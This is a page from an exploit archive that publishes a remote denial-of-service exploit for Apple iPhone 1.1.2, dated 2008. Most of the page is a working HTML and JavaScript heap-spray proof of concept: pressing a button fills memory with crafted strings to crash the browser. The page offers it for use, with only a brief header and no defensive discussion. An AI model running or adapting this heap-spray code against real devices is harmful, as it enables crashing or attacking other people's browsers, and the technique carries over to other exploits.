[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Apple iPhone 1.1.2 Remote Denial of Service Exploit
# Published : 2008-01-24
# Author : c0ntex
# Previous Title : Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)
# Next Title : OpenBSD 4.2 rtlabel_id2name() Local Null Pointer Dereference DoS
<html><body><script>
function Demo() {
var shellcode;
var addr;
var fill;
alert('attempting a crash!');
shellcode = unescape('%u0c0c');
fill = unescape('%ucccc');
addr = 0x02020202;
var b = fill;
while (b.length <= 0x40000) b+=b;
var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}
}
</script>
<input type='button' onClick='Demo()' value='Go!'>
</body></html>
# www.Syue.com [2008-01-24]